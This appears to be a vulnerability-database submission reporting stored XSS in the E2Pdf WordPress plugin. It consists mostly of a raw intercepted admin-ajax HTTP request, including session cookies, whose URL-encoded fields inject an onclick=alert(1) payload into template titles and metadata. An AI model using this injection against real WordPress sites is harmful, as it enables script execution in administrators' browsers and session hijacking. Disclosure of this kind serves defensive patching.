Submit #50190: E2Pdf Stored XSSinfo

TitleE2Pdf Stored XSS
Descriptionxss vulnerability in Templates and add or edit template then submit Html Object but you can submit object with intercept request like that POST /wp-admin/admin-ajax.php?e2pdf_check=true&_nonce=e846c471b4 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-admin/admin.php?page=e2pdf-templates&action=edit&id=2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 12031 Origin: http://localhost Connection: close Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1667326176%7Cf19PDXQcTXj4RRV3EFRKEpsOu49Oii5zBkMEBaU36Hl%7C6e25560bfca371fdb9adff75c09158181bdb8fd92ba9fefac1b0863a34f19b80; wp-settings-time-1=1667193363; wp-settings-1=libraryContent%3Dbrowse; njt-fs-filemanager-settings-tab_last_tab=1; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1667326176%7Cf19PDXQcTXj4RRV3EFRKEpsOu49Oii5zBkMEBaU36Hl%7Cc142d334c271b7671a656cce0e37557593e74bb945baa30ba8894f892351db74 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=e2pdf_save_form&data=%7B%22_nonce%22%3A%22674070771a%22%2C%22sub_action%22%3A%22edit%22%2C%22ID%22%3A%222%22%2C%22width%22%3A%22595%22%2C%22height%22%3A%22842%22%2C%22extension%22%3A%22wordpress%22%2C%22item%22%3A%22tablepress_table%22%2C%22item1%22%3A%22%22%2C%22item2%22%3A%22%22%2C%22pdf%22%3A%22%22%2C%22format%22%3A%22pdf%22%2C%22activated%22%3A%220%22%2C%22templates_limit%22%3A%220%22%2C%22title%22%3A%22test%3Ch1%3Etest%5C%22+onclick%3Dalert(1)+%5C%22%22%2C%22meta-box-order-nonce%22%3A%22e15aebcfdb%22%2C%22closedpostboxesnonce%22%3A%227c28e5ab11%22%2C%22revision_id%22%3A%220%22%2C%22font%22%3A%22Noto+Sans+Regular%22%2C%22font_size%22%3A%2212%22%2C%22line_height%22%3A%2212%22%2C%22text_align%22%3A%22left%22%2C%22rtl%22%3A%220%22%2C%22font_color%22%3A%22%23000000%22%2C%22dataset_title%22%3A%22test%3Ch1%3Etest%5C%22+onclick%3Dalert(1)+%5C%22%22%2C%22dataset_title1%22%3A%22%22%2C%22dataset_title2%22%3A%22%22%2C%22button_title%22%3A%22test%3Ch1%3Etest%5C%22+onclick%3Dalert(1)+%5C%22%22%2C%22resample%22%3A%22100%22%2C%22inline%22%3A%220%22%2C%22auto%22%3A%220%22%2C%22name%22%3A%22test%3Ch1%3Etest%5C%22+onclick%3Dalert(1)+%5C%22%22%2C%22password%22%3A%22%22%2C%22flatten%22%3A%221%22%2C%22appearance%22%3A%221%22%2C%22tab_order%22%3A%220%22%2C%22compression%22%3A%22-1%22%2C%22meta_title%22%3A%22test%3Ch1%3Etest%5C%22+onclick%3Dalert(1)+%5C%22%22%2C%22meta_subject%22%3A%22test%3Ch1%3Etest%5C%22+onclick%3Dalert(1)+%5C%22%22%2C%22meta_author%22%3A%22test%3Ch1%3Etest%5C%22+onclick%3Dalert(1)+%5C%22%22%2C%22meta_keywords%22%3A%22test%3Ch1%3Etest%5C%22+onclick%3Dalert(1)+%5C%22%22%2C%22pages%22%3A%7B%221%22%3A%7B%22properties%22%3A%7B%22width%22%3A%22595%22%2C%22height%22%3A%22842%22%7D%2C%22actions%22%3A%5B%5D%2C%22elements%22%3A%5B%7B%22type%22%3A%22e2pdf-html%22%2C%22properties%22%3A%7B%22right%22%3A%2220%22%2C%22css%22%3A%22%22%2C%22css_priority%22%3A%221%22%2C%22z_index%22%3A%220%22%2C%22text_letter_spacing%22%3A%220%22%2C%22vertical%22%3A%22top%22%2C%22border_top%22%3A%220%22%2C%22border_left%22%3A%220%22%2C%22border_right%22%3A%220%22%2C%22border_bottom%22%3A%220%22%2C%22padding_top%22%3A%220%22%2C%22padding_left%22%3A%220%22%2C%22padding_right%22%3A%220%22%2C%22padding_bottom%22%3A%220%22%2C%22border_color%22%3A%22%23000000%22%2C%22text_color%22%3A%22%22%2C%22text_font%22%3A%22%22%2C%22text_font_size%22%3A%22%22%2C%22text_line_height%22%3A%22%22%2C%22text_align%22%3A%22%22%2C%22rotation%22%3A%220%22%7D%2C%22actions%22%3A%5B%5D%2C%22top%22%3A%2220px%22%2C%22left%22%3A%2220px%22%2C%22width%22%3A%22555px%22%2C%22height%22%3A%2240px%22%2C%22value%22%3A%22%3Ch1%3E%5Be2pdf-wp+key%3D%5C%22post_title%5C%22%5D%3C%2Fh1%3E%22%2C%22name%22%3A%22%22%2C%22page_id%22%3A%221%22%2C%22element_id%22%3A%221%22%7D%2C%7B%22type%22%3A%22e2pdf-html%22%2C%22properties%22%3A%7B%22right%22%3A%2220%22%2C%22css%22%3A%22%22%2C%22css_priority%22%3A%221%22%2C%22z_index%22%3A%220%22%2C%22text_letter_spacing%22%3A%220%22%2C%22vertical%22%3A%22top%22%2C%22border_top%22%3A%220%22%2C%22border_left%22%3A%220%22%2C%22border_right%22%3A%220%22%2C%22border_bottom%22%3A%220%22%2C%22padding_top%22%3A%220%22%2C%22padding_left%22%3A%220%22%2C%22padding_right%22%3A%220%22%2C%22padding_bottom%22%3A%220%22%2C%22border_color%22%3A%22%23000000%22%2C%22text_color%22%3A%22%22%2C%22text_font%22%3A%22%22%2C%22text_font_size%22%3A%22%22%2C%22text_line_height%22%3A%22%22%2C%22text_align%22%3A%22%22%2C%22rotation%22%3A%220%22%7D%2C%22actions%22%3A%5B%5D%2C%22top%22%3A%2280px%22%2C%22left%22%3A%2220px%22%2C%22width%22%3A%22555px%22%2C%22height%22%3A%2212px%22%2C%22value%22%3A%22Post+name%3A+%5Be2pdf-wp+key%3D%5C%22post_name%5C%22%5D%22%2C%22name%22%3A%22%22%2C%22page_id%22%3A%221%22%2C%22element_id%22%3A%222%22%7D%2C%7B%22type%22%3A%22e2pdf-html%22%2C%22properties%22%3A%7B%22right%22%3A%2220%22%2C%22css%22%3A%22%22%2C%22css_priority%22%3A%221%22%2C%22z_index%22%3A%220%22%2C%22text_letter_spacing%22%3A%220%22%2C%22vertical%22%3A%22top%22%2C%22border_top%22%3A%220%22%2C%22border_left%22%3A%220%22%2C%22border_right%22%3A%220%22%2C%22border_bottom%22%3A%220%22%2C%22padding_top%22%3A%220%22%2C%22padding_left%22%3A%220%22%2C%22padding_right%22%3A%220%22%2C%22padding_bottom%22%3A%220%22%2C%22border_color%22%3A%22%23000000%22%2C%22text_color%22%3A%22%22%2C%22text_font%22%3A%22%22%2C%22text_font_size%22%3A%22%22%2C%22text_line_height%22%3A%22%22%2C%22text_align%22%3A%22%22%2C%22rotation%22%3A%220%22%7D%2C%22actions%22%3A%5B%5D%2C%22top%22%3A%22112px%22%2C%22left%22%3A%2220px%22%2C%22width%22%3A%22555px%22%2C%22height%22%3A%2212px%22%2C%22value%22%3A%22Post+type%3A+%5Be2pdf-wp+key%3D%5C%22post_type%5C%22%5D%22%2C%22name%22%3A%22%22%2C%22page_id%22%3A%221%22%2C%22element_id%22%3A%223%22%7D%2C%7B%22type%22%3A%22e2pdf-html%22%2C%22properties%22%3A%7B%22right%22%3A%2220%22%2C%22css%22%3A%22%22%2C%22css_priority%22%3A%221%22%2C%22z_index%22%3A%220%22%2C%22text_letter_spacing%22%3A%220%22%2C%22vertical%22%3A%22top%22%2C%22border_top%22%3A%220%22%2C%22border_left%22%3A%220%22%2C%22border_right%22%3A%220%22%2C%22border_bottom%22%3A%220%22%2C%22padding_top%22%3A%220%22%2C%22padding_left%22%3A%220%22%2C%22padding_right%22%3A%220%22%2C%22padding_bottom%22%3A%220%22%2C%22border_color%22%3A%22%23000000%22%2C%22text_color%22%3A%22%22%2C%22text_font%22%3A%22%22%2C%22text_font_size%22%3A%22%22%2C%22text_line_height%22%3A%22%22%2C%22text_align%22%3A%22%22%2C%22rotation%22%3A%220%22%7D%2C%22actions%22%3A%5B%5D%2C%22top%22%3A%22144px%22%2C%22left%22%3A%2220px%22%2C%22width%22%3A%22555px%22%2C%22height%22%3A%2212px%22%2C%22value%22%3A%22ID%3A+%5Be2pdf-wp+key%3D%5C%22id%5C%22%5D%22%2C%22name%22%3A%22%22%2C%22page_id%22%3A%221%22%2C%22element_id%22%3A%224%22%7D%2C%7B%22type%22%3A%22e2pdf-html%22%2C%22properties%22%3A%7B%22right%22%3A%2220%22%2C%22css%22%3A%22%22%2C%22css_priority%22%3A%221%22%2C%22z_index%22%3A%220%22%2C%22text_letter_spacing%22%3A%220%22%2C%22vertical%22%3A%22top%22%2C%22border_top%22%3A%220%22%2C%22border_left%22%3A%220%22%2C%22border_right%22%3A%220%22%2C%22border_bottom%22%3A%220%22%2C%22padding_top%22%3A%220%22%2C%22padding_left%22%3A%220%22%2C%22padding_right%22%3A%220%22%2C%22padding_bottom%22%3A%220%22%2C%22border_color%22%3A%22%23000000%22%2C%22text_color%22%3A%22%22%2C%22text_font%22%3A%22%22%2C%22text_font_size%22%3A%22%22%2C%22text_line_height%22%3A%22%22%2C%22text_align%22%3A%22%22%2C%22rotation%22%3A%220%22%7D%2C%22actions%22%3A%5B%5D%2C%22top%22%3A%22176px%22%2C%22left%22%3A%2220px%22%2C%22width%22%3A%22555px%22%2C%22height%22%3A%2212px%22%2C%22value%22%3A%22Author%3A+%5Be2pdf-wp+key%3D%5C%22post_author%5C%22%5D%22%2C%22name%22%3A%22%22%2C%22page_id%22%3A%221%22%2C%22element_id%22%3A%225%22%7D%2C%7B%22type%22%3A%22e2pdf-html%22%2C%22properties%22%3A%7B%22right%22%3A%2220%22%2C%22dynamic_height%22%3A%221%22%2C%22css%22%3A%22%22%2C%22css_priority%22%3A%221%22%2C%22z_index%22%3A%220%22%2C%22text_letter_spacing%22%3A%220%22%2C%22vertical%22%3A%22top%22%2C%22border_top%22%3A%220%22%2C%22border_left%22%3A%220%22%2C%22border_right%22%3A%220%22%2C%22border_bottom%22%3A%220%22%2C%22padding_top%22%3A%220%22%2C%22padding_left%22%3A%220%22%2C%22padding_right%22%3A%220%22%2C%22padding_bottom%22%3A%220%22%2C%22border_color%22%3A%22%23000000%22%2C%22text_color%22%3A%22%22%2C%22text_font%22%3A%22%22%2C%22text_font_size%22%3A%22%22%2C%22text_line_height%22%3A%22%22%2C%22text_align%22%3A%22%22%2C%22rotation%22%3A%220%22%7D%2C%22actions%22%3A%5B%5D%2C%22top%22%3A%22208px%22%2C%22left%22%3A%2220px%22%2C%22width%22%3A%22555px%22%2C%22height%22%3A%22300px%22%2C%22value%22%3A%22%5Be2pdf-wp+key%3D%5C%22post_content%5C%22%5D%22%2C%22name%22%3A%22%22%2C%22page_id%22%3A%221%22%2C%22element_id%22%3A%226%22%7D%2C%7B%22type%22%3A%22e2pdf-html%22%2C%22properties%22%3A%7B%22right%22%3A%2220%22%2C%22css%22%3A%22%22%2C%22css_priority%22%3A%221%22%2C%22z_index%22%3A%220%22%2C%22text_letter_spacing%22%3A%220%22%2C%22vertical%22%3A%22top%22%2C%22border_top%22%3A%220%22%2C%22border_left%22%3A%220%22%2C%22border_right%22%3A%220%22%2C%22border_bottom%22%3A%220%22%2C%22padding_top%22%3A%220%22%2C%22padding_left%22%3A%220%22%2C%22padding_right%22%3A%220%22%2C%22padding_bottom%22%3A%220%22%2C%22border_color%22%3A%22%23000000%22%2C%22text_color%22%3A%22%22%2C%22text_font%22%3A%22%22%2C%22text_font_size%22%3A%22%22%2C%22text_line_height%22%3A%22%22%2C%22text_align%22%3A%22%22%2C%22rotation%22%3A%220%22%7D%2C%22actions%22%3A%5B%5D%2C%22top%22%3A%22528px%22%2C%22left%22%3A%2220px%22%2C%22width%22%3A%22555px%22%2C%22height%22%3A%2212px%22%2C%22value%22%3A%22Created%3A+%5Be2pdf-wp+key%3D%5C%22post_date%5C%22%5D%22%2C%22name%22%3A%22%22%2C%22page_id%22%3A%221%22%2C%22element_id%22%3A%227%22%7D%2C%7B%22type%22%3A%22e2pdf-html%22%2C%22properties%22%3A%7B%22right%22%3A%2220%2
Userrezaduty (ID 10530)
Submission10/31/2022 08:22 (2 years ago)
Moderation10/31/2022 18:38 (10 hours later)
StatusDuplicate
VulDB Entry194319

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!